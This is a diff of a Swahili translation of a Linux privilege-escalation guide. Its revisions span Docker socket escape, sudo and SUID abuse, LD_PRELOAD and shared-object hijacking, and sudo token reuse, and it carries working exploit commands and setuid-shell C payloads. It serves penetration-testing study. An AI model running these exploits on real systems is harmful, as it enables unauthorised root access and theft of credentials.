-2.  **Create a Container:** Tuma ombi la kuunda container inayomount directory ya root ya mfumo wa host.
+2.  **Create a Container:** Send a request to create a container that mounts the host system's root directory.
 
 ```bash
 curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"<ImageID>","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create
 ```
 
-Anzisha container uliotengenezwa hivi karibuni:
+Start the newly created container:
 
 ```bash
 curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<NewContainerID>/start
 ```
 
-3.  **Attach to the Container:** Tumia `socat` kuanzisha muunganisho na container, kuruhusu utekelezaji wa amri ndani yake.
+3.  **Attach to the Container:** Use `socat` to establish a connection to the container, enabling command execution within it.
 
 ```bash
 socat - UNIX-CONNECT:/var/run/docker.sock
@@ -588,13 +588,13 @@ Connection: Upgrade
 Upgrade: tcp
 ```
 
-Baada ya kuweka muunganisho wa `socat`, unaweza kuendesha amri moja kwa moja ndani ya container ukiwa na upatikanaji wa root kwa filesystem ya host.
+Baada ya kuanzisha muunganisho wa `socat`, unaweza kutekeleza amri moja kwa moja ndani ya container ukiwa na ufikiaji wa root kwenye mfumo wa faili wa host.
 
-### Mengine
+### Wengine
 
-Kumbuka kwamba ikiwa una write permissions juu ya docker socket kwa sababu uko **inside the group `docker`** una [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
+Kumbuka kwamba ikiwa una ruhusa za kuandika juu ya docker socket kwa sababu uko **inside the group `docker`** una [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). Ikiwa [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
 
-Angalia **more ways to break out from docker or abuse it to escalate privileges** katika:
+Angalia **more ways to break out from docker or abuse it to escalate privileges** in:
 
 
 {{#ref}}
@@ -603,7 +603,7 @@ docker-security/
 
 ## Containerd (ctr) privilege escalation
 
-If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**:
+Ikiwa utagundua kuwa unaweza kutumia amri ya **`ctr`**, soma ukurasa ufuatao kwani **you may be able to abuse it to escalate privileges**:
 
 
 {{#ref}}
@@ -612,7 +612,7 @@ containerd-ctr-privilege-escalation.md
 
 ## **RunC** privilege escalation
 
-If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**:
+Ikiwa utagundua kuwa unaweza kutumia amri ya **`runc`**, soma ukurasa ufuatao kwani **you may be able to abuse it to escalate privileges**:
 
 
 {{#ref}}
@@ -621,15 +621,15 @@ runc-privilege-escalation.md
 
 ## **D-Bus**
 
-D-Bus ni mfumo wa hali ya juu wa Inter-Process Communication (IPC) unaowawezesha applications kuingiliana na kubadilishana data kwa ufanisi. Umeundwa kwa kuzingatia mfumo wa kisasa wa Linux, na kutoa mfumo imara kwa aina tofauti za mawasiliano kati ya applications.
+D-Bus ni mfumo mgumu wa **inter-Process Communication (IPC)** unaowezesha applications kuingiliana na kushirikiana data kwa ufanisi. Umebuniwa kwa kuzingatia mfumo wa kisasa wa Linux, na hutoa mfumo imara kwa aina mbalimbali za mawasiliano ya applications.
 
-Mfumo ni wenye ufanisi mkubwa, ukisaidia IPC ya msingi ambayo inaboresha kubadilishana data kati ya processes, kumbu-kumbu ya **enhanced UNIX domain sockets**. Zaidi ya hayo, husaidia kutangaza matukio au signals, hivyo kuimarisha muunganiko wa vipengele vya mfumo. Kwa mfano, ishara kutoka kwa Bluetooth daemon kuhusu simu inayokuja inaweza kusababisha music player kutulia, kuboresha uzoefu wa mtumiaji. Pia, D-Bus ina support kwa remote object system, ikirahisisha maombi ya service na invocation za method kati ya applications, na kurahisisha michakato ambayo hapo awali ilikuwa ngumu.
+Mfumo huu ni mwingiliano, unaounga mkono IPC za msingi zinazoongeza kubadilishana data kati ya michakato, ukikumbusha **enhanced UNIX domain sockets**. Zaidi ya hayo, husaidia katika kutangaza matukio au ishara, kukuza muunganisho laini kati ya vipengele vya mfumo. Kwa mfano, ishara kutoka kwa Bluetooth daemon kuhusu simu inayokuja inaweza kusababisha music player kutulia, kuboresha uzoefu wa mtumiaji. Aidha, D-Bus inasaidia mfumo wa remote object, unaorahisisha mahitaji ya huduma na invocation za method kati ya applications, kurahisisha michakato ambayo hapo awali ilikuwa ngumu.
 
-D-Bus inaendeshwa kwa **allow/deny model**, ikisimamia ruhusa za ujumbe (miito ya method, utoaji wa signal, n.k.) kulingana na athari ya jumla ya sheria za sera zinazolingana. Sera hizi zinaelezea mwingiliano na bus, na zinaweza kuwezesha privilege escalation kupitia unyonyaji wa ruhusa hizi.
+D-Bus inafanya kazi kwa modeli ya allow/deny, ikisimamia ruhusa za ujumbe (method calls, signal emissions, nk.) kulingana na athari ya jumla ya sheria za sera zinazolingana. Sera hizi zinaelezea mwingiliano na bus, na zinaweza kuruhusu privilege escalation kupitia matumizi mabaya ya ruhusa hizi.
 
-Mfano wa sera kama hizo katika `/etc/dbus-1/system.d/wpa_supplicant.conf` umeonyeshwa, ukielezea ruhusa kwa user root kumiliki, kutuma, na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`.
+Mfano wa sera ya aina hiyo katika `/etc/dbus-1/system.d/wpa_supplicant.conf` umetolewa, ukielezea ruhusa za mtumiaji root kumiliki, kutuma, na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`.
 
-Sera ambazo hazina user au group maalum zinatumika kwa wote, wakati sera za muktadha "default" zinatumika kwa wote wasiotajwa na sera nyingine maalum.
+Sera ambazo hazina mtumiaji au kundi maalum hutumika kwa ujumla, wakati sera za muktadha wa "default" zinaweza kutumika kwa wote wasiofunikwa na sera maalum nyingine.
 ```xml
 <policy user="root">
 <allow own="fi.w1.wpa_supplicant1"/>
@@ -638,7 +638,7 @@ Sera ambazo hazina user au group maalum zinatumika kwa wote, wakati sera za mukt
 <allow receive_sender="fi.w1.wpa_supplicant1" receive_type="signal"/>
 </policy>
 ```
-**Jifunze jinsi ya kuorodhesha na kutumia mawasiliano ya D-Bus hapa:**
+**Jifunze jinsi ya enumerate na exploit D-Bus communication hapa:**
 
 {{#ref}}
 d-bus-enumeration-and-command-injection-privilege-escalation.md
@@ -646,9 +646,9 @@ d-bus-enumeration-and-command-injection-privilege-escalation.md
 
 ## **Mtandao**
 
-Inavutia kila mara kuorodhesha mtandao na kubaini nafasi ya mashine.
+Daima ni ya kuvutia ku enumerate mtandao na kubaini nafasi ya mashine.
 
-### Kuorodhesha kwa jumla
+### Generic enumeration
 ```bash
 #Hostname, hosts and DNS
 cat /etc/hostname /etc/hosts /etc/resolv.conf
@@ -671,24 +671,24 @@ cat /etc/networks
 #Files used by network services
 lsof -i
 ```
-### Open ports
+### Bandari zilizo wazi
 
-Kila wakati angalia huduma za mtandao zinazoendeshwa kwenye mashine ambayo hukuweza kuingiliana nayo kabla ya kuipata:
+Daima angalia huduma za mtandao zinazofanya kazi kwenye mashine ambazo hukuweza kuingiliana nazo kabla ya kufikia mashine hiyo:
 ```bash
 (netstat -punta || ss --ntpu)
 (netstat -punta || ss --ntpu) | grep "127.0"
 ```
 ### Sniffing
 
-Angalia kama unaweza sniff traffic. Ikiwa unaweza, unaweza kupata baadhi ya credentials.
+Angalia ikiwa unaweza sniff traffic. Ikiwa unaweza, unaweza kuwa na uwezo wa kupata baadhi ya credentials.
 ```
 timeout 1 tcpdump
 ```
 ## Watumiaji
 
-### Uorodheshaji wa Kawaida
+### Uorodheshaji wa Kimsingi
 
-Angalia ni **who** wewe ni, ni **privileges** gani ulizonazo, ni **users** gani wako kwenye mfumo, ni yapi wanaoweza **login** na ni nani walio na **root privileges:**
+Angalia **nani** wewe ni, ni **privileges** gani unazo, ni **users** gani wako kwenye mfumo, ni zipi zinaweza **login**, na ni zipi zina **root privileges:**
 ```bash
 #Info about me
 id || (whoami && groups) 2>/dev/null
@@ -712,21 +712,21 @@ gpg --list-keys 2>/dev/null
 ```
 ### UID Kubwa
 
-Baadhi ya toleo za Linux zilikuwa na mdudu unaowawezesha watumiaji wenye **UID > INT_MAX** ku-escalate privileges. Taarifa zaidi: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\
+Baadhi ya matoleo ya Linux yaliathiriwa na mdudu unaowawezesha watumiaji wenye **UID > INT_MAX** kuinua ruhusa. Maelezo zaidi: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) na [here](https://twitter.com/paragonsec/status/1071152249529884674).\
 **Exploit it** using: **`systemd-run -t /bin/bash`**
 
-### Makundi
+### Vikundi
 
-Angalia ikiwa wewe ni **mwanachama wa kundi fulani** ambacho kinaweza kukupa root privileges:
+Angalia kama wewe ni a **mwanachama wa kikundi fulani** ambacho kinaweza kukupa ruhusa za root:
 
 
 {{#ref}}
 interesting-groups-linux-pe/
 {{#endref}}
 
-### Ubao la kunakili
+### Clipboard
 
-Angalia kama kuna kitu chochote kinachovutia kipo ndani ya ubao la kunakili (ikiwa inawezekana)
+Angalia kama kuna chochote cha kuvutia kilicho ndani ya clipboard (ikiwa inawezekana)
 ```bash
 if [ `which xclip 2>/dev/null` ]; then
 echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null`
@@ -741,29 +741,29 @@ fi
 ```bash
 grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs
 ```
-### Known passwords
+### Manenosiri yanayojulikana
 
-Ikiwa **unajua nenosiri lolote** la mazingira, **jaribu kuingia kwa kila mtumiaji** ukitumia nenosiri hilo.
+Ikiwa unajua **nenosiri lolote** la mazingira, **jaribu kuingia kama kila mtumiaji** ukitumia nenosiri hilo.
 
 ### Su Brute
 
-Ikiwa hautasumbuliwa na kutoa kelele nyingi na binari za `su` na `timeout` ziko kwenye kompyuta, unaweza kujaribu brute-force mtumiaji ukitumia [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\
-[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) kwa parameter ya `-a` pia inajaribu brute-force watumiaji.
+Ikiwa haufanyi wasiwasi kuhusu kutoa kelele nyingi na binaries za `su` na `timeout` zipo kwenye kompyuta, unaweza kujaribu ku-brute-force mtumiaji ukitumia [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\
+[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) kwa parameter `-a` pia hujaribu ku-brute-force watumiaji.
 
-## Matumizi mabaya ya PATH
+## Matumizi mabaya ya PATH inayoweza kuandikwa
 
 ### $PATH
 
-Ikiwa utagundua kuwa unaweza **kuandika ndani ya folda fulani ya $PATH** huenda ukaweza kupandisha haki kwa **kuunda backdoor ndani ya folda inayoweza kuandikwa** kwa jina la amri fulani ambayo itatekelezwa na mtumiaji mwingine (root ikiwa inawezekana) na ambayo **haitapakuliwa kutoka folda iliyoko kabla** ya folda yako inayoweza kuandikwa kwenye $PATH.
+Ikiwa ugundua kwamba unaweza **kuandika ndani ya folda fulani ya $PATH** unaweza kuwa unaweza kupandisha vibali kwa **kuunda backdoor ndani ya folda inayoweza kuandikika** kwa jina la amri ambayo itaendeshwa na mtumiaji tofauti (root ikiwezekana) na ambayo **haitapakiwa kutoka kwenye folda iliyoko kabla** ya folda yako inayoweza kuandikika katika $PATH.
 
 ### SUDO and SUID
 
-Unaweza kuruhusiwa kutekeleza amri fulani ukitumia sudo au inaweza kuwa na bit ya suid. Angalia kwa kutumia:
+Unaweza kupewa ruhusa kuendesha amri fulani ukitumia sudo au zinaweza kuwa na suid bit. Angalia kwa kutumia:
 ```bash
 sudo -l #Check commands you can execute with sudo
 find / -perm -4000 2>/dev/null #Find all SUID binaries
 ```
-Baadhi ya **amri zisizotarajiwa zinakuruhusu kusoma na/au kuandika faili au hata kutekeleza amri.** Kwa mfano:
+Baadhi ya **amri zisizotarajiwa zinakuwezesha kusoma na/au kuandika faili au hata kutekeleza amri.** Kwa mfano:
 ```bash
 sudo awk 'BEGIN {system("/bin/sh")}'
 sudo find /etc -exec sh -i \;
@@ -774,36 +774,36 @@ less>! <shell_comand>
 ```
 ### NOPASSWD
 
-Usanidi wa Sudo unaweza kumruhusu mtumiaji kutekeleza amri fulani kwa kutumia ruhusa za mtumiaji mwingine bila kujua nenosiri.
+Mipangilio ya Sudo yanaweza kumruhusu mtumiaji kutekeleza amri fulani kwa kutumia ruhusa za mtumiaji mwingine bila kujua nywila.
 ```
 $ sudo -l
 User demo may run the following commands on crashlab:
 (root) NOPASSWD: /usr/bin/vim
 ```
-Katika mfano huu mtumiaji `demo` anaweza kuendesha `vim` kama `root`; sasa ni rahisi kupata shell kwa kuongeza ssh key katika root directory au kwa kuendesha `sh`.
+Katika mfano huu mtumiaji `demo` anaweza kuendesha `vim` kama `root`, sasa ni rahisi kupata shell kwa kuongeza ufunguo wa `ssh` kwenye saraka ya `root` au kwa kuita `sh`.
 ```
 sudo vim -c '!sh'
 ```
 ### SETENV
 
-Amri hii inamruhusu mtumiaji **kuweka variable ya mazingira** wakati anatekeleza kitu:
+Maelekezo haya yanamruhusu mtumiaji **kuweka variable ya mazingira** wakati anatekeleza kitu:
 ```bash
 $ sudo -l
 User waldo may run the following commands on admirer:
 (ALL) SETENV: /opt/scripts/admin_tasks.sh
 ```
-Mfano huu, **based on HTB machine Admirer**, ulikuwa **dhaifu** kwa **PYTHONPATH hijacking** kupakia maktaba yoyote ya python wakati script ikitekelezwa kama root:
+Mfano huu, **inayotokana na mashine ya HTB Admirer**, ulikuwa **nyeti** kwa **PYTHONPATH hijacking** ambayo iliruhusu kupakia maktaba yeyote ya python wakati script ikiendeshwa kama root:
 ```bash
 sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
 ```
 ### BASH_ENV imehifadhiwa kupitia sudo env_keep → root shell
 
-Ikiwa sudoers inahifadhi `BASH_ENV` (mfano, `Defaults env_keep+="ENV BASH_ENV"`), unaweza kutumia tabia ya kuanzishwa isiyo ya kiingiliano ya Bash kuendesha code yoyote kama root unapomtumia amri iliyoruhusiwa.
+Ikiwa sudoers inahifadhi `BASH_ENV` (mfano, `Defaults env_keep+="ENV BASH_ENV"`), unaweza kutumia tabia ya kuanzisha ya Bash isiyo ya kuingiliana ili kuendesha msimbo wowote kama root unapoita amri inayoruhusiwa.
 
-- Kwa nini inafanya kazi: Kwa non-interactive shells, Bash hutathmini `$BASH_ENV` na inasource faili hiyo kabla ya kuendesha script lengwa. Kanuni nyingi za sudo zinaruhusu kuendesha script au shell wrapper. Ikiwa `BASH_ENV` imehifadhiwa na sudo, faili yako itasourced kwa root privileges.
+- Kwa nini inafanya kazi: Kwa non-interactive shells, Bash huchambua `$BASH_ENV` na hushirikisha faili hiyo kabla ya kuendesha script lengwa. Kanuni nyingi za sudo zinaruhusu kuendesha script au shell wrapper. Ikiwa `BASH_ENV` imetunzwa na sudo, faili yako inashirikishwa kwa ruhusa za root.
 
 - Mahitaji:
-- Sudo rule unayoweza kuendesha (target yoyote inayoanzisha `/bin/bash` non-interactively, au script yoyote ya bash).
+- Sudo rule unayoweza kuendesha (lengo lolote linaloitaja `/bin/bash` non-interactively, au script yoyote ya bash).
 - `BASH_ENV` kuwepo katika `env_keep` (angalia kwa `sudo -l`).
 
 - PoC:
@@ -816,14 +816,14 @@ chmod +x /dev/shm/shell.sh
 BASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo   # or any permitted script/binary that triggers bash
 # You should now have a root shell
 ```
-- Kukaza usalama:
-- Ondoa `BASH_ENV` (na `ENV`) kutoka `env_keep`, tumia `env_reset`.
-- Epuka wrapper za shell kwa amri zinazoruhusiwa na sudo; tumia binaries ndogo.
-- Zingatia logging ya sudo I/O na alerting wakati env vars zilizohifadhiwa zinapotumika.
+- Kuimarisha:
+- Ondoa `BASH_ENV` (na `ENV`) kutoka `env_keep`, badala yake tumia `env_reset`.
+- Epuka shell wrappers kwa amri zinazoruhusiwa na sudo; tumia minimal binaries.
+- Fikiria sudo I/O logging na alerting wakati preserved env vars zinapotumika.
 
-### Njia za bypassing za utekelezaji wa sudo
+### Njia za bypassing utekelezaji wa sudo
 
-**Ruka** kusoma faili nyingine au tumia **symlinks**. Kwa mfano kwenye faili ya sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_
+**Ruka** kusoma faili nyingine au tumia **symlinks**. Kwa mfano katika faili ya sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_
 ```bash
 sudo less /var/logs/anything
 less>:e /etc/shadow #Jump to read other files using privileged less
@@ -833,7 +833,7 @@ less>:e /etc/shadow #Jump to read other files using privileged less
 ln /etc/shadow /var/log/new
 sudo less /var/log/new #Use symlinks to read any file
 ```
-Ikiwa **wildcard** inapotumika (\*), ni rahisi hata zaidi:
+Ikiwa **wildcard** imetumika (\*), ni rahisi zaidi:
 ```bash
 sudo less /var/log/../../etc/shadow #Read shadow
 sudo less /var/log/something /etc/shadow #Red 2 files
@@ -842,37 +842,37 @@ sudo less /var/log/something /etc/shadow #Red 2 files
 
 ### Sudo command/SUID binary bila njia ya amri
 
-Ikiwa **sudo permission** imetolewa kwa amri moja tu **bila kutaja njia ya amri**: _hacker10 ALL= (root) less_ unaweza kuiexploit kwa kubadilisha PATH variable
+Iwapo **sudo permission** imetolewa kwa amri moja **bila kubainisha njia**: _hacker10 ALL= (root) less_ unaweza ku-exploit kwa kubadilisha variable ya PATH.
 ```bash
 export PATH=/tmp:$PATH
 #Put your backdoor in /tmp and name it "less"
 sudo less
 ```
-Mbinu hii pia inaweza kutumika ikiwa **suid** binary **inatekeleza amri nyingine bila kutaja njia yake (hakikisha kila wakati kwa kutumia** _**strings**_ **yaliyomo ya binary isiyo ya kawaida ya SUID)**.
+Njia hii pia inaweza kutumika ikiwa binary ya **suid** **inatekeleza amri nyingine bila kutaja path yake (daima angalia kwa** _**strings**_ **maudhui ya binary ya SUID isiyo ya kawaida)**).
 
 [Payload examples to execute.](payloads-to-execute.md)
 
-### SUID binary yenye njia ya amri
+### SUID binary na command path
 
-Ikiwa binary ya **suid** **inatekeleza amri nyingine kwa kutaja njia**, basi unaweza kujaribu **export a function** iitwayo kama amri ambayo faili ya suid inaiita.
+Ikiwa binary ya **suid** **inatekeleza amri nyingine kwa kutaja path**, basi, unaweza kujaribu **export a function** iitwayo kwa jina la amri ambayo faili ya suid inaiita.
 
-Kwa mfano, ikiwa binary ya suid inaita _**/usr/sbin/service apache2 start**_ unapaswa kujaribu kuunda function hiyo na kui-export:
+Kwa mfano, ikiwa binary ya suid inaita _**/usr/sbin/service apache2 start**_ you have to try to create the function and export it:
 ```bash
 function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
 export -f /usr/sbin/service
 ```
-Kisha, unapoiita binary ya suid, kazi hii itaendeshwa
+Kisha, unapoita suid binary, funsi hii itaendeshwa
 
 ### LD_PRELOAD & **LD_LIBRARY_PATH**
 
-Kigezo cha mazingira **LD_PRELOAD** kinatumika kubainisha maktaba moja au zaidi za pamoja (.so files) ambazo loader itapakia kabla ya nyingine zote, ikiwemo maktaba ya kawaida ya C (`libc.so`). Mchakato huu unajulikana kama preloading ya maktaba.
+The **LD_PRELOAD** environment variable is used to specify one or more shared libraries (.so files) to be loaded by the loader before all others, including the standard C library (`libc.so`). This process is known as preloading a library.
 
-Hata hivyo, ili kudumisha usalama wa mfumo na kuzuia kipengele hiki kutumika vibaya, hasa kwa ejecutables za **suid/sgid**, mfumo unatekeleza masharti fulani:
+Hata hivyo, ili kudumisha usalama wa mfumo na kuzuia kipengele hiki kutumiwa vibaya, hasa kwa executables za **suid/sgid**, mfumo unaweka masharti fulani:
 
-- Loader haizingatii **LD_PRELOAD** kwa executables ambapo real user ID (_ruid_) haifanani na effective user ID (_euid_).
-- Kwa executables za **suid/sgid**, maktaba hupakiwa kabla tu ikiwa zipo katika njia za kawaida ambazo pia zimetengwa kama suid/sgid.
+- The loader disregards **LD_PRELOAD** for executables where the real user ID (_ruid_) does not match the effective user ID (_euid_).
+- For executables with suid/sgid, only libraries in standard paths that are also suid/sgid are preloaded.
 
-Privilege escalation inaweza kutokea ikiwa una uwezo wa kutekeleza amri kwa `sudo` na matokeo ya `sudo -l` yanajumuisha taarifa **env_keep+=LD_PRELOAD**. Mpangilio huu unaruhusu kigezo cha mazingira **LD_PRELOAD** kubaki na kutambuliwa hata wakati amri zinapofanywa kwa `sudo`, jambo linaloweza kusababisha utekelezwaji wa arbitrary code kwa elevated privileges.
+Privilege escalation can occur if you have the ability to execute commands with `sudo` and the output of `sudo -l` includes the statement **env_keep+=LD_PRELOAD**. This configuration allows the **LD_PRELOAD** environment variable to persist and be recognized even when commands are run with `sudo`, potentially leading to the execution of arbitrary code with elevated privileges.
 ```
 Defaults        env_keep += LD_PRELOAD
 ```
@@ -894,12 +894,12 @@ Kisha **compile it** ukitumia:
 cd /tmp
 gcc -fPIC -shared -o pe.so pe.c -nostartfiles
 ```
-Hatimaye, **escalate privileges** ukiendesha
+Mwishowe, **escalate privileges** ukiendesha
 ```bash
 sudo LD_PRELOAD=./pe.so <COMMAND> #Use any command you can run with sudo
 ```
 > [!CAUTION]
-> Privesc sawa inaweza kutumiwa vibaya ikiwa mshambuliaji anadhibiti kigezo cha mazingira **LD_LIBRARY_PATH** kwa sababu anadhibiti njia ambapo maktaba zitatafutwa.
+> Privesc sawa inaweza kutumika vibaya ikiwa mshambulizi anadhibiti **LD_LIBRARY_PATH** env variable kwa sababu anadhibiti njia ambapo libraries zitatafutwa.
 ```c
 #include <stdio.h>
 #include <stdlib.h>
@@ -921,13 +921,13 @@ sudo LD_LIBRARY_PATH=/tmp <COMMAND>
 ```
 ### SUID Binary – .so injection
 
-Unapotokea kuwa na binary yenye ruhusa za **SUID** ambazo zinaonekana zisizo za kawaida, ni mazoea mazuri kuthibitisha kama inapakia faili za **.so** ipasavyo. Hii inaweza kuthibitishwa kwa kuendesha amri ifuatayo:
+Unapokutana na binary yenye ruhusa za **SUID** ambazo zinaonekana zisizo za kawaida, ni desturi nzuri kuthibitisha kama inapakia faili za **.so** ipasavyo. Hii inaweza kukaguliwa kwa kuendesha amri ifuatayo:
 ```bash
 strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
 ```
-Kwa mfano, kukutana na hitilafu kama _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ kunapendekeza uwezekano wa exploitation.
+Kwa mfano, kupata hitilafu kama _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ kunaonyesha uwezekano wa exploitation.
 
-Ili exploit hii, mtu angeendelea kwa kuunda faili ya C, kwa mfano _"/path/to/.config/libcalc.c"_, lenye msimbo ufuatao:
+Ili exploit hii, mtu angeendelea kwa kuunda faili ya C, sema _"/path/to/.config/libcalc.c"_, yenye msimbo ufuatao:
 ```c
 #include <stdio.h>
 #include <stdlib.h>
@@ -938,13 +938,13 @@ void inject(){
 system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
 }
 ```
-Msimbo huu, mara ukisanywa na kutekelezwa, unalenga kuinua vibali kwa kubadilisha ruhusa za faili na kuendesha shell yenye vibali vilivyoongezwa.
+Msimbo huu, mara tu ukichanganuliwa (compiled) na kutekelezwa (executed), unalenga kuongeza privileges kwa kubadilisha ruhusa za faili na kutekeleza shell yenye privileges zilizoinuliwa.
 
-Kusanya C file hapo juu kuwa shared object (.so) file kwa:
+Tengeneza (compile) C file iliyotajwa juu kuwa shared object (.so) file kwa kutumia:
 ```bash
 gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c
 ```
-Hatimaye, kuendesha SUID binary iliyokumbwa kunapaswa kuanzisha exploit, kuruhusu uwezekano wa kuvamiwa au kuvunjika kwa usalama wa mfumo.
+Hatimaye, kuendesha SUID binary iliyoharibika kunapaswa kuchochea exploit, kuruhusu uwezekano wa kuvunjwa kwa usalama wa mfumo.
 
 ## Shared Object Hijacking
 ```bash
@@ -956,7 +956,7 @@ something.so => /lib/x86_64-linux-gnu/something.so
 readelf -d payroll  | grep PATH
 0x000000000000001d (RUNPATH)            Library runpath: [/development]
 ```
-Sasa tumeipata SUID binary inayo-load library kutoka kwa folder ambamo tunaweza kuandika, hebu tuunde library katika folder hiyo kwa jina linalohitajika:
+Sasa tunapokuwa tumepata SUID binary inayopakia library kutoka kwenye folda tunaoweza kuandika, hebu tuunde library katika folda hiyo kwa jina linalohitajika:
 ```c
 //gcc src.c -fPIC -shared -o /development/libshared.so
 #include <stdio.h>
@@ -969,7 +969,7 @@ setresuid(0,0,0);
 system("/bin/bash -p");
 }
 ```
-Ikiwa unapata hitilafu kama
+Ikiwa unapata hitilafu kama vile
 ```shell-session
 ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name
 ```
@@ -977,9 +977,9 @@ hii inamaanisha kwamba maktaba uliyotengeneza inahitaji kuwa na function inayoit
 
 ### GTFOBins
 
-[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyochaguliwa ya Unix binaries ambazo zinaweza kutumiwa na mshambuliaji kuvuka vikwazo vya usalama vya kienyeji. [**GTFOArgs**](https://gtfoargs.github.io/) ni sawa lakini kwa kesi ambapo unaweza **kuingiza hoja tu** kwenye amri.
+[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyochaguliwa ya Unix binaries ambazo zinaweza kutumiwa na mshambuliaji kuvuka vikwazo vya usalama vya eneo. [**GTFOArgs**](https://gtfoargs.github.io/) ni sawa lakini kwa kesi ambapo unaweza **kuingiza vigezo tu** katika amri.
 
-Mradi huu hukusanya function halali za Unix binaries ambazo zinaweza kutumiwa vibaya kutoroka restricted shells, kuongeza au kudumisha elevated privileges, kuhamisha faili, kuzalisha bind na reverse shells, na kurahisisha kazi nyingine za post-exploitation.
+Mradi unakusanya kazi halali za Unix binaries ambazo zinaweza kutumika vibaya kuvunja restricted shells, kuongeza au kudumisha elevated privileges, kuhamisha files, kuzalisha bind na reverse shells, na kurahisisha kazi zingine za post-exploitation.
 
 > gdb -nx -ex '!sh' -ex quit\
 > sudo mysql -e '! /bin/sh'\
@@ -998,50 +998,50 @@ https://gtfoargs.github.io/
 
 ### FallOfSudo
 
-Ikiwa unaweza kufikia `sudo -l` unaweza kutumia zana [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) kukagua ikiwa inapata njia ya ku-exploit sheria yoyote ya sudo.
+If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) to check if it finds how to exploit any sudo rule.
 
-### Kutumia tena Sudo Tokens
+### Reusing Sudo Tokens
 
-Katika kesi ambapo una **sudo access** lakini huna nywila, unaweza kuongeza privileges kwa **kusubiri utekelezaji wa amri ya sudo kisha uiba token ya session**.
+Katika matukio ambapo una **sudo access** lakini huna nenosiri, unaweza kuongeza privileges kwa **kusubiri utekelezaji wa amri ya sudo kisha ku-hijack session token**.
 
 Mahitaji ya kuongeza privileges:
 
 - Tayari una shell kama mtumiaji "_sampleuser_"
-- "_sampleuser_" ame **tumia `sudo`** kutekeleza kitu katika **dakika 15 zilizopita** (kwa default hiyo ndio muda wa sudo token unaoturuhusu kutumia `sudo` bila kuingiza nywila yoyote)
+- "_sampleuser_" ame **tumia `sudo`** kutekeleza kitu katika **dakika 15 zilizopita** (kwa default hiyo ndiyo muda wa sudo token unaoturuhusu kutumia `sudo` bila kuingiza nenosiri)
 - `cat /proc/sys/kernel/yama/ptrace_scope` ni 0
-- `gdb` inapatikana (uweze kuipakia)
+- `gdb` inapatikana (unaweza kuiweka/upload)
 
-(Unaweza kwa muda kuwezesha `ptrace_scope` kwa `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` au kwa kudumu kubadilisha `/etc/sysctl.d/10-ptrace.conf` na kuweka `kernel.yama.ptrace_scope = 0`)
+(Unaweza kwa muda kuwezesha `ptrace_scope` kwa kutumia `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` au kwa kudumu kubadilisha `/etc/sysctl.d/10-ptrace.conf` na kuweka `kernel.yama.ptrace_scope = 0`)
 
-Iki mahitaji haya yote yakitimizwa, **unaweza kuongeza privileges kwa kutumia:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject)
+Ikiwa mahitaji yote yamekamilika, **uweza kuongeza privileges kwa kutumia:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject)
 
-- The **first exploit** (`exploit.sh`) itaumba binary `activate_sudo_token` katika _/tmp_. Unaweza kuitumia **kuamsha sudo token kwenye session yako** (hutapokea moja kwa moja root shell, fanya `sudo su`):
+- The **first exploit** (`exploit.sh`) will create the binary `activate_sudo_token` in _/tmp_. Unaweza kuitumia **kuactivate the sudo token in your session** (hautapata moja kwa moja root shell, fanya `sudo su`):
 ```bash
 bash exploit.sh
 /tmp/activate_sudo_token
 sudo su
 ```
-- **exploit ya pili** (`exploit_v2.sh`) itaunda sh shell katika _/tmp_ **inayomilikiwa na root yenye setuid**
+- **exploit ya pili** (`exploit_v2.sh`) itaunda sh shell katika _/tmp_ **inamilikiwa na root yenye setuid**
 ```bash
 bash exploit_v2.sh
 /tmp/sh -p
 ```
